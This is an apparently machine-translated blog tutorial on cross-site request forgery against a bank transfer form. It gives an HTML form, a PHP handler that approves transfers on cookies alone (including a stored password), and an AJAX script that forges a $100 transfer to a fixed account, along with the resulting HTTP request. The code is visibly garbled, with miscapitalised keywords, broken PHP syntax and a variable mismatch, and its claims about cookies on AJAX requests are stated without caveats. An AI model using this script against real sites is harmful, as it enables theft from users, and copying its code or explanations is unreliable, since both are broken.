With CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself.
A great example of using on CSRF, is bank site after the user connects to site created cookies on his computer (Role of the cookies is save the data ).
From this moment any action was med from the user browser approved by the site system. here comes in the AJAX technology, with the AJAX we can to send request (packet request) sent med by the browser itself.
This means all the cookies and sessions of the user sent with the request (Unlike server-side language) So if there is a form that is used on bank site to money transfer.
We can send POST request to a form using AJAX and the request is approved by the site system, because all the cookies of the user browser sent with the AJAX request
Example for CSRF exploit
Html:
Code:
<Form action = "" method = "post" name = "transfer">
Amount of money to transfer:
<Label>
<Input type = "text" name = "money" id = "money"/> $
</Label>
<Br/>
For bank account:
<Label>
<Input type = "text" name = "Baccount" id = "Baccount"/>
</Label>
<P>
<Label>
<Input type = "submit" name = "send" id = "send" value = "Submit"/>
</Label>
</P>
</Form> php:
Code:
<? Php
If (isset ($ _ POST ['send'])
{
If (is_numeric ($ _ COOKIE ['id'] & isset ($ _ COOKIE ['Password'])
{
If (..)
{
// If is valid cookies
// Transfer
}
Else
{
// If is invalid cookies
// Blocking
}
}
}
?>
What's the risk here ?, As you can see the php script check if it's valid cookies and without additional filtering operation approved the transfer.
This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer.
AJAX:
Code:
<Script type = "text/javascript">
Var http = GetXmlHttpObject ();
If (http! = Null)
{
Var url = ""; // Attacking form address
Var pack = "money = 100 & Baccount = 0123456789 & send = Submit ";
Http. open ("POST", url, true );
Http. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
Http. setRequestHeader ("Content-length", pack. length );
Http. setRequestHeader ("Connection", "close ");
Http. send (params );
}
Function GetXmlHttpObject ()
{
If (window. XMLHttpRequest)
{
Return new XMLHttpRequest ();
}
If (window. ActiveXObject)
{
Return new ActiveXObject ("Microsoft. XMLHTTP ");
}
Return null;
}
</Script>
As already explained, requests sent AJAX are sent from the browser itself so we do not have to worry about to get the cookies of the user.
So even though we sent only the POST in the request sent to the server you'll see something like this:
Code:
POST/file. php HTTP/1.1 \ r \ n
Host: www.2cto.com \ r \ n
Cookie: id =...; password =...; \ r \ n
Connection: Close \ r \ n
Content-Type: application/x-www-form-urlencoded \ r \ n
Content-Length:... \ r \ n
Money = 100 & Baccount = 0123456789 & send = Submit
Once returned from the server 200 (request was received ed successfully) transferred $100 from the user account to account number 0123456789.
And so the CSRF attack works, Good bye...
From http://hi.baidu.com/evilrapper/blog/item/9bc74f36ede15c2e0a55a91e.html